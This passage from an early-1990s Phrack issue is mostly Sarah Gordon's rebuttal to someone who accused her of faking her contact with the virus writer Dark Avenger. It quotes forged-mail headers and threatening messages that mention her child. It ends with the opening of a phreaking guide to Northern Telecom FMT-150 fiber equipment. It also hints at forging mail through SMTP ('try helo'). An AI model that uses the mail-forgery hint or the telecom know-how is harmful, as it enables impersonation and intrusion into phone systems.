account. All I had was my mediocre BBS. He couldn't get to my BBS any way but to call me, directly. Yes, I have an account there -now-, but I don't and didn't use it to chat with Dark Avenger. He did not want the sysadmin to monitor our chats. And, I didn't -have- that account until after I had talked to Dark Avenger for a long time, so I could hardly have used that server to talk to him early on I didn't have an account there then :) In fact, neither did he, at that time, because there was no digsys.bg as far as I know. He called Danbo BBS for years. It was not on the internet. He did later use it later, once it actually got onto the internet, to occasionally mail me, but not much. He used it more to come to IRC. In fact, a couple people you know talked to him there, with me. They didn't like him much; found him rude and arrogant. He can be. However, he most certainly did call me here. Does Kohntark think he is the only one who can make long distance telephone calls? Dark Avenger called me frequently, and not always from Bulgaria. I don't know how or if he paid for the calls, all I know is that since I couldn't afford to call, and didn't know any number for him, he called me. As for my "mediocre" BBS, it serves its purpose:) I think giving out virus free anti-virus products, and products that don't cost the users a small fortune, and that actually WORK is quite a good purpose. I don't see any reason for people to be exploited by some a-v companies, who are promoted by various magazines, which in turn rate them highly because they are doing their advertising. As it was expected, Sara(h) quickly 'noticed' my personal message to the dark avenger and replied to my questioning in a public post in FIDONET, (I don't read FIDONET posts and she knows I have no access to them!!!! ) Kohntark called my BBS, at my invitation, on July 13, 1993 at 23:19. There's no other way he could have left any mail because its an invite only system. It's not like it was any big shock to me that he called. He asked me to make him an account and I did. Dark Avenger was a regular caller to my BBS, and read his message, I imagine, since he fwded it to me. I don't know what access Kohntark has or doesn't have, as far as what networks he uses, (as far as what networks he reads mail from, that is) as I explained to him. I mailed him there because of the mail he left to Dark Avenger (which he forwarded to me) on MY system, and because I received a very nasty message from Kohntark, using the address kohntark@rot.in.hell.com, if I remember correctly. I sent the message, and did include answers to his questions because I wanted to continue talking with him. The message had the headers included from, guess where? cxxxxx.ic.xxxxxx.edu.... She claimed that the dark avenger was fully aware of how much money she made out of the VNI interviews and that she was in touch with him, etc.etc. This is the truth. In case anyone is curious, the amount of money I made from this article was less than the amount of my PC Pursuit Bill from calling to do chats and talks with him. At that time he had accesses via various networks, and we talked on a regular basis. Additionally, Dark Avenger had full control over taking out or editing any of his comments in the interview. It is a policy of mine. If you wish to confirm it, I can put you in touch with other virus writers. I can in fact do it any time probably, as they are usually around where we are. Let me know if you want me to do it. Dark Avenger was even a bit obsessive about how much money I would make. I also "sold" the story to PCWorld, where it has been published, in part. I have not received any compensation for this yet. More later on why I did the interview. Maybe the problem is I didn't interview Kohntark... Afterward, I questioned her again about the whole affair and demanded a proof, or some sort of direct contact from the dark avenger to my anonymous internet account. First, I do not have to "prove" my contact with this man to anyone. It has been well enough observed and documented every step of the way. Ever hear of the dedicated virus? It is the demo virus that came with the Mutation Engine. It contains "We dedicate this little virus to sara gordon who wanted to have a virus named after her". (At this point, Dark Avenger did not really know me, we were just establishing our contact; he still used the spelling Sara for my name :) I provided Kohntark with an address with Dark Avengers permission. Actually, the account Dark Avenger had at digsys which he used to get to me on chats or IRC (2 years after initial contact) was not under the name Dark Avenger OR dav, but under another name which would draw less attention to itself if someone happened to finger us during one of our chats. The system adminstrator made the additional account later, since he knew quite well it -was- Dark Avenger, having had an ongoing battle with him for years. Kohntark wrote to Dark Avenger there, just like he said he did. At least this much is true. And, I did receive copies of the mail. Actually Dark Avenger did not want to even answer the mail, but I asked him to please do it so that the guy would leave me alone. Someone using the same mail headers had already sent a message to WIRED, telling them "The DA is old news, he hasn't made a virus in 2 years, you should interview ME". Wonder who that might have been...... Does the header cxxxxx.ic.xxxxxx.edu ring any bells? At that point, Kohntark forged mail to WIRED magazine, this time posing as Dark Avenger. I would never have known this, but Dark Avenger fwd back a very strange reply message from WIRED and asked me what in the hell was going on. In that message, WIRED had included part of the message they had received. It clearly displayed the cxxxxx.ic.xxxxxx.edu headers, indicating that the mail had been sent from someone there! Someone who told WIRED "I don't want to talk to you" (paraphrased). Even WIRED told me "That mail did not sound like Dark Avenger..it was just all wrong" (paraphrased). I pointed out the headers to them later. It was a bad hack on Kohntark's part. Anyone doubts, it mail the sysadmin at digsys.bg. Here is a copy of that mail, with "compromising" parts xxxxed out. First, Dark Avenger's legitimate fwd to me: From dav@digsys.bg Sat Jul 24 20:36:12 1993 Return-Path: Received: from mcsun.EU.net by mail.netcom.com (5.65/SMI-4.1/Netcom) id AA04202; Sat, 24 Jul 93 20:34:29 -0700 Received: from danbo.UUCP by mcsun.EU.net with UUCP id AA18612 (5.65b/CWI-2.220); Sun, 25 Jul 1993 05:35:36 +0200 Received: by danbo.digsys.bg (5.67/1.37) via EUnet id AA06614; Sun, 25 Jul 93 05:33:30 +0300 From: dav@digsys.bg (Dark Avenger) Message-Id: <9307250233.AA06614@danbo.digsys.bg> Subject: Re: FWD>None (fwd) To: vfr@netcom.com Date: Sun, 25 Jul 93 5:33:29 EET DST X-Mailer: ELM [version 2.3 PL11] Status: OR Then, the message from xxxxxxxxxxx at WIRED: Forwarded message: >From xxxxxx!wired.com!xxxxx Sat Jul 24 01:34:30 1993 Message-Id: <9307232129.AA02102@wired.com> Date: 23 Jul 1993 14:27:42 -0800 From: "xxxxxxxxxxx" Subject: Re: FWD>None To: dav@digsys.bg Reply to: RE>FWD>None *Some mail from WIRED guy replying to the message*** And now, the mail that prompted xxxxxxx's reply. I guess Kohntark didn't realize that the mail would receive a reply. Or, didn't realize the reply would include the mail headers: -------------------------------------- Date: 7/23/93 12:35 AM To: xxxxxxxxxxx From: xxxx Received: by xx.wired.com with SMTP;22 Jul 1993 05:38:19 -0800 Received: from anon.penet.fi by wired.com via SMTP (920330.SGI/911001.SGI) for xxxxx@xx.wired.com id AA00423; Thu, 22 Jul 93 05:35:20 -0700 Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ id AA21218; Thu, 22 Jul 93 15:24:44 +0300 Date: Thu, 22 Jul 93 15:24:44 +0300 From: dav@digsys.bg Message-Id: <9307221224.AA21218@anon.penet.fi> Return-Path: Date: Fri 13, 66 00:00:00 EST To: Subject:Not interest. Status:RO I read in VIRUS-L that some idiot (atman@rahut.net) wants to do interview with me face to face. I am not interested in being in your magazine. I am not interested in being interviewed, even if you offer me $1000. or more. I am not interested. so tell your friend to stop mentioning me in VIRUS-L, i have NO interest. Please don't bother to reply. I have no time for stupidity. --------- Interesting use of the anonymous mailer port 25, eh? (clue: try helo) Since this was the first time anyone had ever questioned the validity of her relationship with the DA, she took this to heart and shortly after, I received 3 short messages originating from an Internet connected UNIX system in Bulgaria. HAHAHA. This has been questioned many times. Do you think the ACM, or any magazine would risk printing this without adequate proof? My contacts early on with the virus writer were well documented. I had to prove myself to everyone from Vesselin Bontchev (who did not believe me until he had seen the source code to Commander Bomber, which is a virus; the source code has never been made available to anyone). Here: From bontchev@informatik.uni-hamburg.de Tue Oct 12 02:34:53 1993 Return-Path: Received: from deneb.dfn.de by mail.netcom.com (5.65/SMI-4.1/Netcom) id AA09608; Tue, 12 Oct 93 02:34:34 -0700 Received: from fbihh.informatik.uni-hamburg.de by deneb.dfn.de (4.1/SMI-4.2) id AA05014; Tue, 12 Oct 93 10:33:30 +0100 From: bontchev@informatik.uni-hamburg.de (Vesselin Bontchev) Message-Id: <9310120933.AA22605@fbihh.informatik.uni-hamburg.de> Received: by fbihh.informatik.uni-hamburg.de (5.65+/FBIHH-1.21); id AA22605; Tue, 12 Oct 93 10:33:45 +0100 Subject: Re: urgent To: vfr@netcom.com Date: Tue, 12 Oct 1993 10:33:42 +0100 (MET) In-Reply-To: <9310120331.AA01134@netcom4.netcom.com> from "sara" at Oct 11, 93 08:31:48 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 2211 Status: OR ....blah blah..(deleted) So, here is my official statement. I hereby confirm that when I met Sarah S. Gordon in March 1993 in New York, she showed me the original source of the Commander Bomber virus. It was obviously a source and not a disassembly, and it was very similar to a couple of other sources of Dark Avenger's programs that I have seen. When I say "similar" I mean such things like label names, commenting style, layout of the text and so on. Of course, this is not a proof that it has been really produced by the Dark Avenger, but this is very probable. Sarah didn't give me a copy of it and I didn't insist, because she told me that she has promised to Dark Avenger not to give this source to anybody. To my knowledge, nobody else has the source. Regards, Vesselin - -- Vesselin Vladimirov Bontchev Virus Test Center, University of Hamburg Tel.:+49-40-54715-224, Fax: +49-40-54715-226 Fachbereich Informatik - AGN < PGP 2.3 public key available on request. > Vogt-Koelln-Strasse 30, rm. 107 C e-mail: bontchev@fbihh.informatik.uni-hamburg.de 22527 Hamburg, Germany Keep in mind, Vesselin is not a product developer and has no affiliation with any developers. He is a Doctoral Student who has himself been accused of being the Dark Avenger. The Bulgarian Secret Police seemed to believe my contact was legitimate enough. I received an "invitation" to meet with them. I declined this "invitation" because I am not interested in the terrorist tactics of a desperate government to blame a hacker and virus writer for the problems of the country in general. I had to prove my contact lots of ways, just to get the article in print. Why did I want this article in print? One simple reason. To show this virus writer as not some evil sinister monster from Hell waiting to destroy the earth's supercomputer. Just as a person like the rest of us. Did it accomplish it? I think it did, from the response I got from most people. Did -I- personally 'benefit' from it? In some ways, I did. This reminds me, a certain ex-virus exchange sysop told me that he was going to make me expose the Dark Avenger; that he was going to find out his true identity, where no one else could; that he would make up some story, any story, to force Dark Avenger out into the open. Well, I don't narc on my friends. I am sure you can appreciate that. Here they are: (Private, compromising parts are X'd out) 1st Message: -------------------------------------------------------------------------------- - >From daemon@digsys.bg Wed Jul 14 19:07 EDT 1993 Received: from danbo.digsys.bg by XXXXXXXXXXXXXXXXXXXXXX; Wed, 14 Jul 93 19:07:3 4 -0400 Return-Path: Received: by XXXXXXXXXXXXXX (5.67/1.35) id AA12850; Thu, 15 Jul 93 02:04:46 +0300 Message-Id: <9307142304.AA12850@XXXXXXXXXXXX> To: XXXXXXX From: dav@danbo.digsys.bg Date: Wed, 14 Jul 93 23:41:36 +0300 Subject: No subject Status: RO kohntark- i just talked to a friend of mine who said you dont like her user log. why shouldnt i call her from bulgaria? i call whoever i want to, and this is not your problem. by the way, she sent me your mail. for your information, i do know how much money she made of that interview. and i also think that this is none of your business. also, maybe it would be good for you to know, that by offending her, you are offending me, too. keep this in mind. Second Message: ------------------------------------------------------------------------- >My mail with her is none of your business either. i dont think so, dude. maybe you need to read the next few lines again, in case you missed them. >> >> also, maybe it would be good for you to know, that by offending >> her, you are offending me, too. keep this in mind. >> >> > >HA HA! and you expect me to believe that you are the DA! >send me a proof: an email address from bulgaria or tell me >how many addressing modes does the MTE have? > >nice try. well, what do you think the domain .bg in my email address stands for? maybe you think its kameroon? as for the mte, im not giving you any info. i need not prove anything to anybody, and certainly dont plan to waste more of my time talking to you. you have been warned. Third Message: ------------------------------------------------------------------------- oh, yeah. sure it did. only you will not know where something else came from, when it knocks on your door. i have nothing more to say. ------------------------------------------------------------------------- Odd. He did not include the mail he forged using the address I gave him in good faith to WIRED magazine. He also did not include the mail he forged to Anthony Naggs, an engineer, in which he made the following statements: > > From @gate.demon.co.uk,@anon.penet.fi:darkavenger@sofia.somewhere.bg Fri Sep 17 18:16:32 1993 > > Received: from post.demon.co.uk by ubik.demon.co.uk with SMTP > > id AA4544 ; Fri, 17 Sep 93 18:16:22 GMT > > Received: from post.demon.co.uk via puntmail for amn@ubik.demon.co.uk; > > Fri Sep 17 14:49:12 BST 1993 > > Received: from gate.demon.co.uk by post.demon.co.uk id gk03845; > > 17 Sep 93 14:09 BST > > Received: from anon.penet.fi by gate.demon.co.uk id aa01230; > > 17 Sep 93 6:07 GMT-60:00 > > Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^see originating mail location? > > id AA15730; Fri, 17 Sep 93 07:58:28 +0300 > > From: DarkAvenger@sofia.somewhere.bg > > Message-Id: <9309170458.AA15730@anon.penet.fi> > > Return-Path: > > Date: Thursday, 16 Sept 93 22:02:54 > > To: amn@ubik.demon.co.uk > > MMDF-Warning: Parse error in original version of preceding line at gate. demon.co.uk > > Subject: NO i am NOT > > Status: RO > > NO , I have not found "more interesting thigs to do"! > If you don't know it yet, I am still active and will release > work at the end of the year. > Also in case you don't know the VNI interview was mostly made up. > I haven't talked to Sara in almost a year, and I will never again. > She betrayed me. > She will deny this and try to exploit my name more. > Until the end of year. > > Then again.. what do you know? you are like the weasel: another > stupid engineer.. you know nothing about viruses! > > UNtil then.. > > > > ------- Dark Avenger spells my name with an "h" :) And, he doesn't mail people from cxxxxx.ic.xxxxxx.edu :) And, I think this pretty clearly illustrates the motivations and methods of Kohntark. In my ignorance, I blindly trusted the three cryptic replies to be true, even thought whoever replied refused to give out trivial information such as the number of addressing modes for a 2 year old encryption engine (MTE) and spelled Cameroon with a 'k' (Check out Sara Gordon's spelling of URUGUAY in VIRUS-L Volume 6 Issue 120 -v06i120) Shortly after other unrelated discussions and a CUD post from Sara(h) in which I was mentioned (unnamed), someone warned me of several posts in NUKENET by an alleged dark avenger and Todor Todorov from an account belonging to the last, mentioning me and Aristotle. Sheesh. Kameroon with a -K- is the German spelling. It is also the most common spelling a European would use. The "correct" spelling, for anyone who cares, is Cameroun, because it is mainly a French speaking colony; A small portion of it is English-speaking and uses Cameroon. Most likely, An American would use Cameroon. Consult your nearest linguist or historical specialist for verification. Talk to discman about my linguistic aptitude. Do not attempt this at home. Kohntark spelled SKISM incorrectly in one of his messages to me. He must be the Dark Avenger. No, wait..he onlys -wants- to be... Those messages in the NukeNet were prompted by the virus exchange sysop mentioned earlier asking Todor Todorov to contact Dark Avenger and ask him if he had really talked to me. Todor -is- a friend of mine. He assisted me in my study of virus exchange bbs and their impact on end users. Todor put the mail on some Bulgarian BBS, and Dark Avenger answered it. Apparently, his answer was not liked very well by this Aristotle and others people, because an amateur linguistic analysis followed, detailing how much like me the Dark Avenger appeared to be. I employed the services of a professional linguist, who stated that indeed there are striking similarities. This can be attributed to the fact that Dark Avenger and I have spent many hours together. And, I usually type in lower case, in E-Mail messages, etc. Come to think of it, most of the hackers I know must be the Dark Avenger if this is the qualification :) In those messages I was referred to as 'hotshot,' a word that Sara Gordon had used on me several times on our personal email exchange; It was then that I became highly suspicious of the whole matter. Yes, I used this word. I use it all the time. So does Dark Avenger. It is a word we use to refer to certain people. It is a commonly used word in Bulgaria. It is not so common here, but it is there. They watch a lot of American television, and use a lot of words like this as well as a lot of profanity. Movies. Motherfucker and Asshole are two other words used a lot by Bulgarian hackers and virus writers. In fact, the word "motherfucker", which "proved" it was NOT a Bulgarian that posted as :) in the NuKeNet (since, as they said, NO Bulgarian would EVER use -this- word), was found in a virus of Bulgarian origin a very long time ago. Perhaps they should learn to disassemble the damned things before trying to say what's in them. In defense of NuKe (and believe me, there has been no love lost between some of those people and myself in the past), I think a lot of people were baited and led on by certain people. I called Virginia's Virus Research Institute's sysop and owner, Aristotle to find out more about the posts and he bought to my attention the particular writing style of Sara(h) Gordon: She NEVER uses capital letters and apostrophes on her personal email, and always signs her name on the lower left hand corner. (She seldom signs her posts Virginia Virus Research Institute is (was) The Black Axis BBS. The place that sold viruses for one hundred dollars per collection. Pretty enterprising, eh? Only, a lot of them were junk. The sysop is the same one who told me he was going to get the Dark Avenger to come forth, to 'Save my Name' or something like that. He also told me that if a new virus appeared, bearing the name 'Dark Avenger', people would want to 'catch' the virus writer again. And, guess what? Such a virus did appear. A crude hack of the Burma virus, with a text string included: DARKAVENGER :). And, it was this very sysop that uploaded it to a certain well known virus exchange BBS. Slick, huh? But definitely not the work of Dark Avenger. However, this will not make me identify the Dark Avenger, assuming I did know the path to his door. This same sysop also told me (when he closed his system) that he had intentionally tried to incite people, and had made some mistakes along the way in doing this. We all make mistakes. Unfortunately, Kohntark is making a really big mistake here. Yes, I use lower case ALL THE TIME. And, like Dark Avenger, I sometimes do and sometimes do not use correct punctuation. Apparently Kohntark has not been around in the early days of postings on Fidonet. Oh, that's right. He does not read it. Well, if he had, he would have seen Dark Avenger had this 'style' a long time before I ever heard of computer viruses. I am using upper case in this article (mostly) because when I write for a readership (as opposed to private mail, and online chats, etc.), I use correct form. Well, as correct form as I can. nowadays and changes her user name in her vfr@netcom.com account every week!; for further proof of her writing style, please refer to public posts in VIRUS-L Volume 6 #120; I also have over 100K of personal email exchange to prove this fact!) Shame on me. I change my user name :) I am so El33t.... I'm too hexy for my shirt, too hexy for my shirt...blah blah It was then that we realized that she was passing herself as Todor Todorov and the dark avenger (who could possibly verify their online identity?) and had infiltrated NUKENET.. HAHAHAHAHAHAAHHAAHHA oops, excuse me..hahahahahaha This is ridiculous, as anyone who has checked will know. Todorov is happy to take calls from people about this matter; eminent publicly (not anonymous) figures in the field know that I wrote the truth, and there really is nothing further to be said about this nonsense. The writing style described corresponds exactly to the one on the posts I received from the 'dark avenger.' Shortly afterward the account was cancelled and I learned the whole truth: Oh my. My writing style corresponds exactly to Dark Avengers. It certainly does, when I want it to, or when I have been writing to him a lot. And, it does when I write e-mail. So what? So does the style of a of people :) We are all Dark Avenger. If you counted the names of everyone who writes in lower case, makes spelling areas, and signs their mail in the lower left hand corner of messages, how many people do you think you would find? About the account: Yes, it was cancelled. After Kohntark forged mail from that site, prompting a response from WIRED, I asked the system administrator to cancel the account so that no more such trickery could take place, requiring me to spend time trying to straighten it out. He was happy to do it. He had more than a few problems with Dark Avenger ftping files in excess, and had only retained the account as a personal favor to me. (yes, that IS how he signs personal mail, e-mail and some of his viruses) did not exactly be a nice boy on that system. The danbo.digsys.bg Bulgarian site belongs to Daniel Kalchev, another self appointed AV researcher whose best claims to fame are submitting various Bulgarian viruses to Patricia Hoffman's VSUM!! Self-appointed? He is the administrator of the Internet there. I think Kohntark is not fully aware of just who Mr. Kalchev is. (You can check this by doing a search on 'Kalchev' on the current VSUMs or you can contact him thru: ) No. The best address is daniel@digsys.bg. Mr. and Mrs. Kalchev both have accounts there, and you can reach them best if you use this address. And please do feel free to contact him. He will tell you that he has talked to Dark Avenger for a very long time. Long before digsys was on the internet, and long before I met either of them. He is a very close friend of Sara(h) Gordon and he has an account in her VFR BBS (you can check this by logging into her system and checking the user list) and SHE has an account in digsys.bg under (this account is still valid as far as I know; notice the H after her name!) Of course he is a very close friend of mine. He has visited me here, and has been a great help to me in my work. Yes, I do have an account there. It has been there since I was invited by the Bulgarian ACM to present my work on Computer Viruses at their International Computer Virus Conference. It was nice of Daniel to do this for me, to make it convenient for me to access my mail, as I could have it forwarded there. We never did remove the account, as Bulgarian's prefer to mail in their own country for some reason. The H after my name is very simple: My name is Sarah Gordon. On the nets, I use Sara. When I am friends with someone, I use my given name. I do not like my given "familiar" name to be used in my articles or in e-mail from people I don't know. It is a quirk, I guess. My papers are presented using the Sara variant :) What I concluded is that is the DA would never get an account in such system as he HATES Daniel Kalchev!!!! Another wrong conclusion. The DA might not, but then the District Attorney usually doesn't :) Wrong. and Right. He certainly did get an account there. Call Daniel Kalchev or mail him to ask him. He has had many conversations with Dark Avenger there. He does sure hate Daniel. In this one thing, Kohntark is correct. He hates him violently. And, he's been on his BBS for years. Where do you think he used to post messages FROM? I tried repeatedly to act as intermediary between Dark Avenger and Kalchev, because they both have been very good to me. There was just no way to do it. Dark Avenger thinks Kalchev is (in his own words) "asshole hotshot with big company and lots of money, he can afford to give free accounts...". And yes, he used the word HOTSHOT. JUST LIKE ME. This is what really happened: Sara(h) Gordon in her desperation to prove that she was in touch with the dark avenger, told her pal Daniel Kalchev to make an account under the dark avenger's name ( this is how she always refers to him, even though he never signs his name that way (check the source code for his 'Dark Avenger' virus or the 'Commander Bomber' virus message name: [DAME]) No one has the source code for Commander Bomber that I know of except myself and Dark Avenger, as I previously noted. He has signed his name this way for a very long time, in his e-mail. You can verify this easily enough by asking Todor, Daniel, Bontchev, or anyone who used to read his old posts. Sometimes he does, sometimes he doesn't, just like me. From there she could email me messages that would come from Bulgaria and would be untraceable since she would log into her account in digsys.bg and log into the account internally from the same site in Bulgaria. (You can check where and when most of the people log from in most internet unix and vax sites) :). If I wanted to mail Kohntark untraceable messages, I would not have to go to this extreme, as you well know :) As it is expected from her, she has denied any of this. Some of her ridiculous explanations include things like "hotshot is a very common English word in Bulgaria" !!! You might ask yourself what is the deal with the h? is it sara or sarah?? Well, I asked her the same question when I noticed this in one of the VNI interviews, where her name is spelled as Sarah. She replied that this was a mistake of the publisher. Mistake? well not really, it was another lie, meant to throw off any information and truth seekers, for example you can check her account in Daniel Kalchev's system: I explained this previously. It was a mistake. VNI is not supposed to use my given entire familiar name. In fact, they did mess up. They did not use it in the Dark Avenger interview, despite I had put it there as "Sarah". I told Dark Avenger I would do this for him. He asked me to do it, but for some reason they did not. Later, they -did- use my given name in a totally different situation. I can't account for their errors. , spelled with an H, another 'mistake of the publisher?' :) Other countless Sara Gordon lies are told in NUKE Info- Journal # 6. In the last NuKe Journal, the authors posted some private mail of mine, and said "Look how nice she knows this public mail will be read"..at the same time, the posted some public mail, from my BBS, which I had forwarded to one of them as a reply, and said "Look how nasty she is when she thinks no one can see". All in all, their response to both letters prompted a lot of people to think I had -joined- NuKe. For the record, nope. This behavior puts in question the validity of the VNI interviews and the reputation of Sara(h) Gordon as a serious (self appointed) 'virus researcher' :) IMHO the VNI interviews are a complete fabrication, meant only to boost her validity as a 'journalist', and to make her lots of money, charging for further 'interviews' to other magazines. (She has offered her paid 'interviewing' services to various other publications.) :) Lots of money? Well, first off, I told you how the Dark Avenger interview profited me. It didn't. Secondly, yes, I do write for magazines and I sell the articles. Some, I give away. I don't do any of this for the money. As for other interviewing, I recently interviewed two virus writers (one who has stopped, one who has not), and they are quite pleased with the articles. I'll ask them to contact you personally to tell you as the article is not yet in print. Keep in mind, I have literally no control over commentary by editors, omissions, etc. To the best of my knowledge the information I present here is true and can be checked. Yes, it can be checked, and I hope you check it and print what you find along with this commentary. I chose to publish this information, despite threats against my well being and countless lies about me propagated by Sara(h) Gordon. Now, about threats and lies. Here is the sort of mail I have received from Kohntark. In the interest of space, I will send you the headers, etc., so that you can see them and include here only the sort of diatribe he has been so vehemently sending me. I contacted his system administrator after this continued for such a long time. I'm not a Cori. I don't take every "hey, wanna have phone sex" message as a potential threat, I don't call people's probation officers for the hell of it, I don't ring up sysadmins at the drop of a hat to accuse innocent people of causing trouble. And, I discussed this situation with a lot of people, hackers and virus writers, friends and foes, prior to taking this action. There's no way to know over the nets if someone is really a maniac or if they are just playing around. In this case, considering the nature of the mail, I did contact them. First, the apology after he had gotten particularly nasty. Organization: Anonymous contact service Reply-To: xxxxxx@anon.penet.fi Subject: Apology Date: Fri, 30 Jul 93 8:08:45 EDT Status: OR Sara: I want to apologize for everything that I have said that you might have found offensive. I drop all accusations I have made against you. again, I am sorry. I have no desire in creating any animosity, and / or bad publicity to my name or yours. Sorry things got this silly and out of hand. Please accept my apologies and let's drop the whole thing OK? Thank you. ------------ Followed almost immediately by a forgery. What Kohntark did not realize is that I am in contact with Simon. In fact, I arranged for him to come to a virus conference, with all of his expenses paid. I am writing an article for 40-HEX, and I immediately called Simon to ask what in the hell was this about. After he told me, I went back and checked the mail headers. Guess what I found? From simon@skism.login.qc.ca Sat Jul 31 07:44:26 1993 Received: from anon.penet.fi by mail.netcom.com (5.65/SMI-4.1/Netcom) id AA17333; Sat, 31 Jul 93 07:44:19 -0700 Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ id AA21213; Sat, 31 Jul 93 17:40:54 +0300 From: simon@skism.login.qc.ca Message-Id: <9307311440.AA21213@anon.penet.fi> Return-Path: ****Notice: He misspelled skism. Maybe -he- is the Dark Avenger. I mean, if spelling counts..*** Date: Fri, 30 Jul 93 12:01:02 EST Subject: get real! Apparently-To: Status: OR to vfr@netcom.com.... (Nobody) what is the matter? everyone knows you are sara gordon, are you afraid to sign you own name now?? Yes sara gordon, i heard rumours that you are passing yourself as the dark avenger. It wouldn't surprise me since you are even afraid to sign your own postings. -------- Ha. Actually he signed the above message at the bottom left:) He must be me in Real Life.... As we all have seen by now, if you sign the bottom left of your mail, you are Sara Gordon. Then, here he tells me how he has proved yet another self-appointed virus researcher wrong. Of course, the researcher in question is not wrong. He is Vesselin Bontchev, a rather pedantic but technically brilliant anti-virus Doctoral student at the University of Hamburg. Kohntark seems obsessed with proving anti-virus researchers wrong. It would make more sense to me to learn from the researchers. I am not talking about product developers or sales people, but researchers. ME=Sara HIM=Kohntark ME: dont you get it? im sorry, i am not going to respond to all of this nonsense. maybe you can get vesselin to respond to you again, but i doubt it considering his opinion of your 'knowledge'... HIM: I don't give a damn about what he thinks, I have shown the self appointed virus expert is wrong.That is all. --------- and, here (i'm reverting to UNIX lower case now, i must be the dark avenger..), he begins his harassment again. HIM: you don't have any children do you? It shows Then, after he tell me he knows all about me, he proceeds to mail me to taunt me with addresses referring to my child. From kohntark@youhavea10yearoldson.com Sun Aug 29 10:55:45 1993 Return-Path: Received: from [193.64.138.3] by mail.netcom.com (5.65/SMI-4.1/Netcom) id AA07061; Sun, 29 Aug 93 10:55:39 -0700 Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ id AA22796; Sun, 29 Aug 93 20:50:35 +0300 ME: am tired of your threats. the only danger you are to me is to waste my time with this nonsense. HIM: we will see. HIM: Never underestimate the power of hate. HIM: The end is coming. HIM: Also: you said 'oh my name is spelled SARA, VNI misspelled it! yeah right ! you idiot! you forgot who you are dealing here ha ha! not a fool like you!!! stupid tricks like changing your name can't defend you from thy mighty Kohntark! prepare yourself!! the end is near! Obviously i have overestimated your intelligence.. My dog has a higher IQ.. "who is anthony naggs?.." DUHH! Thanx for making my job easier he he. You think you got me? sure.. go ahead.. fry that guy's account, you will be doing me a favour he he! AH, and start looking for a new job.. you will need it soon after i am done with you you idiot! ------ He likes me to know he is watching me. Only, for a supreme UNIX hacker, he has not mastered the skills quite yet..note the paths again.. (baby copperfield is one of the names i used. i have red hair, and its a long story; someone asked me if i had read dickens and i replied 'yes, I've read baby copperfield'. CHFN followed :) But this was a bit eerie mail. Love him? From babycopperfield@haha.com Sun Sep 12 17:39:50 1993 Received: from anon.penet.fi by mail.netcom.com (5.65/SMI-4.1/Netcom) id AA22703; Sun, 12 Sep 93 17:39:42 -0700 Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ id AA24832; Mon, 13 Sep 93 03:39:00 +0300 From: babycopperfield@haha.com Message-Id: <9309130039.AA24832@anon.penet.fi> Return-Path: Date: Fri 13 Dec 66 00:00:00 To: (Sara) Subject: I know you are on... Status: OR hi! i know you are logged on now... shame we cannot talk,, you know friendly discussions ha ha.. i might call to your bbs.. can i upload your gif picture?? yes? if i like you you might just get lucky ... Love me. ------ More of his article.. I am doing this to stop the lies and corruption fostered by the Anti-Virus industry. --------- What do you think? Is he doing -this- to stop the lies and corruption? It seems to me that the anti-virus industry would benefit from the Dark Avenger coming back onto the scene. They could sell more software, get the whole hacking community attacked by people who are afraid enough already. Why we could get a whole entire Legion of Virus Fighters up in arms, eh? If Kohntark wanted to do this 'stopping of lies and corruption', he would not be helping to recreate the myth of the Dark Avenger. He would not be impersonating him, harassing me, and telling people (impersonating Dark Avenger) that he will still release viruses into the wild. I also do not like lies and corruption, and work very hard to stop it. I do not profit from it in any substantial way. I run a free BBS: I distribute anti-virus software for free, and encourage people to choose software that will work for them in their situation. I don't go for the big scare tactics used by some companies, and I don't recommend those products. Not only because I don't like their marketing, but because their products are not as efficient/accurate as other products. I don't like that we have to have these products, but we do. It's a fact of life. If we can educate people on the real situation with viruses, we can stop a lot of this "Let's get those bad virus writers" before it's too late. We don't need another Dark Avenger. We don't need laws that will infringe on our freedoms. If anyone takes this "Sara and the Dark Avenger scam" even half-way seriously, they can email me, and ask me whatever specific questions they like. I also have a suggestion here, one that might even lead to some sort of agreement between this Kohntark and the rest of the hacker community that does not support lies and harassment. You call Todorov, e-mail or call Bontchev. Ask them. I'll come to HoHoCon (if someone buys me a ticket; although Kohntark thinks I had better look for a job, the fact is I don't have a real job), and compile the bomber source code and MtE Source (not the pitiful disassemblies that appear on a lot of BBS, but the REAL source, supplied to me by when I questioned HIM to make sure he was the "Real Thing". I'll show you step by step how it compiles flawlessly and works. If after you confirm that to the best of your knowledge, what I am saying is true, then I think Kohntark owes me an apology. And, an apology to the rest of the virus writers and hackers who do not need or deserve to be portrayed as evil demented creatures who are waiting to "Destroy the World". ==Phrack Magazine== Volume Four, Issue Forty-Four, File 13 of 27 **************************************************************************** METRO P/H Presents Northern Telecom's FMT-150B/C/D Optical Fiber Digital Transmission System ðIntroð This file will cover the FMT-150, the equipment that sends info over the digital trunks using lasers. It is an accompaniment to our guide to remotes (COs). I will cover all the interesting and useful stuff. This file is mostly for SERIOUS phreaks, we'll have more non-technical cool stuff coming up. ðSystem Descriptionð The FMT-150 fiber optic transmission system combines DM-13 multiplexers and 150 Mb/s Fiber Transports in compact shelf packages, I will refer to it as a shelf. The FMT-150 product architecture supports subscriber loop and interoffice link applications using hub, drop/insert, repeater and terminal configurations. The following is what a FMT-150 shelf system consists of. FMT-150B 1 DM-13 multiplexer (multiplexes 3 signals into one signal of 44.736 Mb/s.) 1 150 Mb/s fiber interface 1 maintenance control unit 1 service channel unit (optional) 2 (or 4) power supply units FMT-150C 2 DM-13 multiplexers 2 (or 4) power supply units FMT-150D 2 150 Mb/s fiber interfaces 2 service channel units (both optional) 2 maintenance control units 2 (or 4) power supply units ðMaintenanceð Service Channel Unit Order-wire Facility Two voice channels per DS-3 signal are provided for individual addressing using DIP switches on the SCU. Dial over a 4 wire headset/handset. (more in Order-Wire) Interfaces The CRT (good old Cathode 